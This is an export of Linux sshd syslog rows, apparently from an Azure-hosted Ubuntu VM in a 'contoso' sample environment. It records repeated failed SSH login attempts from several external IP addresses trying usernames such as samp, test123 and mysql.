+15347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:46:23,UbuntuDevEnv,2019-06-26 05:46:22,auth,UbuntuDevEnv,info,Invalid user 424246 from 140.143.223.242 port 44232,14831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,140.143.223.2,44232,,
+15348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:46:23,UbuntuDevEnv,2019-06-26 05:46:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,14831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:46:23,UbuntuDevEnv,2019-06-26 05:46:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,14831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:46:25,UbuntuDevEnv,2019-06-26 05:46:25,auth,UbuntuDevEnv,info,Failed password for invalid user 424246 from 140.143.223.242 port 44232 ssh2,14831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,140.143.223.2,44232,,
+15351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:46:26,UbuntuDevEnv,2019-06-26 05:46:26,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 44232:11: Bye Bye [preauth],14831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,44232,,
+15352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:46:26,UbuntuDevEnv,2019-06-26 05:46:26,auth,UbuntuDevEnv,info,Disconnected from invalid user 424246 140.143.223.242 port 44232 [preauth],14831,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,424246,140.143.223.2,44232,,
+15353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:48:27,UbuntuDevEnv,2019-06-26 05:48:26,auth,UbuntuDevEnv,info,Invalid user samp from 140.143.223.242 port 59560,15257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,samp,140.143.223.2,59560,,
+15354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:48:27,UbuntuDevEnv,2019-06-26 05:48:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,15257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:48:27,UbuntuDevEnv,2019-06-26 05:48:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,15257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:48:29,UbuntuDevEnv,2019-06-26 05:48:29,auth,UbuntuDevEnv,info,Failed password for invalid user samp from 140.143.223.242 port 59560 ssh2,15257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,samp,140.143.223.2,59560,,
+15357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:48:31,UbuntuDevEnv,2019-06-26 05:48:31,auth,UbuntuDevEnv,info,Disconnected from invalid user samp 140.143.223.242 port 59560 [preauth],15257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,samp,140.143.223.2,59560,,
+15358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:48:31,UbuntuDevEnv,2019-06-26 05:48:31,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 59560:11: Bye Bye [preauth],15257,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,59560,,
+15359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:50:26,UbuntuDevEnv,2019-06-26 05:50:25,auth,UbuntuDevEnv,info,Invalid user qiong123 from 140.143.223.242 port 46792,15763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qiong123,140.143.223.2,46792,,
+15360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:50:26,UbuntuDevEnv,2019-06-26 05:50:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,15763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:50:26,UbuntuDevEnv,2019-06-26 05:50:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,15763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:50:28,UbuntuDevEnv,2019-06-26 05:50:27,auth,UbuntuDevEnv,info,Failed password for invalid user qiong123 from 140.143.223.242 port 46792 ssh2,15763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qiong123,140.143.223.2,46792,,
+15363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:50:28,UbuntuDevEnv,2019-06-26 05:50:27,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 46792:11: Bye Bye [preauth],15763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,46792,,
+15364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:50:28,UbuntuDevEnv,2019-06-26 05:50:27,auth,UbuntuDevEnv,info,Disconnected from invalid user qiong123 140.143.223.242 port 46792 [preauth],15763,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,qiong123,140.143.223.2,46792,,
+15365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:52:23,UbuntuDevEnv,2019-06-26 05:52:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242  user=test123,16172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test123,140.143.223.2,,0,
+15366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:52:25,UbuntuDevEnv,2019-06-26 05:52:25,auth,UbuntuDevEnv,info,Failed password for test123 from 140.143.223.242 port 33898 ssh2,16172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,33898,,
+15367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:52:25,UbuntuDevEnv,2019-06-26 05:52:25,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 33898:11: Bye Bye [preauth],16172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,33898,,
+15368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:52:25,UbuntuDevEnv,2019-06-26 05:52:25,auth,UbuntuDevEnv,info,Disconnected from authenticating user test123 140.143.223.242 port 33898 [preauth],16172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test123,140.143.223.2,33898,,
+15369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:54:27,UbuntuDevEnv,2019-06-26 05:54:27,auth,UbuntuDevEnv,info,Invalid user pa55w0rd from 140.143.223.242 port 49232,16600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pa55w0rd,140.143.223.2,49232,,
+15370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:54:27,UbuntuDevEnv,2019-06-26 05:54:27,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,16600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:54:27,UbuntuDevEnv,2019-06-26 05:54:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,16600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:54:29,UbuntuDevEnv,2019-06-26 05:54:28,auth,UbuntuDevEnv,info,Failed password for invalid user pa55w0rd from 140.143.223.242 port 49232 ssh2,16600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pa55w0rd,140.143.223.2,49232,,
+15373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:54:30,UbuntuDevEnv,2019-06-26 05:54:29,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 49232:11: Bye Bye [preauth],16600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,49232,,
+15374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:54:30,UbuntuDevEnv,2019-06-26 05:54:29,auth,UbuntuDevEnv,info,Disconnected from invalid user pa55w0rd 140.143.223.242 port 49232 [preauth],16600,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pa55w0rd,140.143.223.2,49232,,
+15375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:57:08,UbuntuDevEnv,2019-06-26 05:57:07,auth,UbuntuDevEnv,info,Invalid user robson from 45.55.190.46 port 45110,17052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,robson,45.55.190.4,45110,,
+15376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:57:08,UbuntuDevEnv,2019-06-26 05:57:07,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:57:08,UbuntuDevEnv,2019-06-26 05:57:07,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,17052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+15378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:57:09,UbuntuDevEnv,2019-06-26 05:57:09,auth,UbuntuDevEnv,info,Failed password for invalid user robson from 45.55.190.46 port 45110 ssh2,17052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,robson,45.55.190.4,45110,,
+15379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:57:10,UbuntuDevEnv,2019-06-26 05:57:09,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 45110:11: Bye Bye [preauth],17052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,45110,,
+15380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:57:10,UbuntuDevEnv,2019-06-26 05:57:09,auth,UbuntuDevEnv,info,Disconnected from invalid user robson 45.55.190.46 port 45110 [preauth],17052,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,robson,45.55.190.4,45110,,
+15381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:58:54,UbuntuDevEnv,2019-06-26 05:58:53,auth,UbuntuDevEnv,info,Invalid user vcloud from 106.12.27.140 port 11312,17540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vcloud,106.12.27.1,11312,,
+15382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:58:54,UbuntuDevEnv,2019-06-26 05:58:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:58:54,UbuntuDevEnv,2019-06-26 05:58:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,17540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:58:56,UbuntuDevEnv,2019-06-26 05:58:56,auth,UbuntuDevEnv,info,Failed password for invalid user vcloud from 106.12.27.140 port 11312 ssh2,17540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vcloud,106.12.27.1,11312,,
+15385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:58:57,UbuntuDevEnv,2019-06-26 05:58:56,auth,UbuntuDevEnv,info,Disconnected from invalid user vcloud 106.12.27.140 port 11312 [preauth],17540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vcloud,106.12.27.1,11312,,
+15386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:58:57,UbuntuDevEnv,2019-06-26 05:58:56,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 11312:11: Bye Bye [preauth],17540,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,11312,,
+15387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:00:16,UbuntuDevEnv,2019-06-26 06:00:15,auth,UbuntuDevEnv,info,Invalid user ada from 106.12.27.140 port 19290,17862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ada,106.12.27.1,19290,,
+15388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:00:16,UbuntuDevEnv,2019-06-26 06:00:15,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,17862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:00:16,UbuntuDevEnv,2019-06-26 06:00:15,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,17862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:00:18,UbuntuDevEnv,2019-06-26 06:00:17,auth,UbuntuDevEnv,info,Failed password for invalid user ada from 106.12.27.140 port 19290 ssh2,17862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ada,106.12.27.1,19290,,
+15391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:00:18,UbuntuDevEnv,2019-06-26 06:00:17,auth,UbuntuDevEnv,info,Disconnected from invalid user ada 106.12.27.140 port 19290 [preauth],17862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ada,106.12.27.1,19290,,
+15392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:00:18,UbuntuDevEnv,2019-06-26 06:00:17,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 19290:11: Bye Bye [preauth],17862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,19290,,
+15393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:03:44,UbuntuDevEnv,2019-06-26 06:03:43,auth,UbuntuDevEnv,info,Invalid user papiers from 106.12.27.140 port 43220,18651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,papiers,106.12.27.1,43220,,
+15394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:03:44,UbuntuDevEnv,2019-06-26 06:03:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,18651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:03:44,UbuntuDevEnv,2019-06-26 06:03:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:03:46,UbuntuDevEnv,2019-06-26 06:03:45,auth,UbuntuDevEnv,info,Failed password for invalid user papiers from 106.12.27.140 port 43220 ssh2,18651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,papiers,106.12.27.1,43220,,
+15397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:03:46,UbuntuDevEnv,2019-06-26 06:03:46,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 43220:11: Bye Bye [preauth],18651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,43220,,
+15398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:03:46,UbuntuDevEnv,2019-06-26 06:03:46,auth,UbuntuDevEnv,info,Disconnected from invalid user papiers 106.12.27.140 port 43220 [preauth],18651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,papiers,106.12.27.1,43220,,
+15399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:04:44,UbuntuDevEnv,2019-06-26 06:04:43,auth,UbuntuDevEnv,info,Invalid user germaine from 106.12.27.140 port 51194,18863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,germaine,106.12.27.1,51194,,
+15400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:04:44,UbuntuDevEnv,2019-06-26 06:04:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140,18863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.12.27.1,,0,
+15401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:04:44,UbuntuDevEnv,2019-06-26 06:04:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,18863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:04:46,UbuntuDevEnv,2019-06-26 06:04:46,auth,UbuntuDevEnv,info,Failed password for invalid user germaine from 106.12.27.140 port 51194 ssh2,18863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,germaine,106.12.27.1,51194,,
+15403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:04:46,UbuntuDevEnv,2019-06-26 06:04:46,auth,UbuntuDevEnv,info,Received disconnect from 106.12.27.140 port 51194:11: Bye Bye [preauth],18863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,51194,,
+15404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:04:46,UbuntuDevEnv,2019-06-26 06:04:46,auth,UbuntuDevEnv,info,Disconnected from invalid user germaine 106.12.27.140 port 51194 [preauth],18863,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,germaine,106.12.27.1,51194,,
+15405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:05:50,UbuntuDevEnv,2019-06-26 06:05:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.12.27.140  user=mysql,19098,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysql,106.12.27.1,,0,
+15406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:05:52,UbuntuDevEnv,2019-06-26 06:05:52,auth,UbuntuDevEnv,info,Failed password for mysql from 106.12.27.140 port 59170 ssh2,19098,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.12.27.1,59170,,
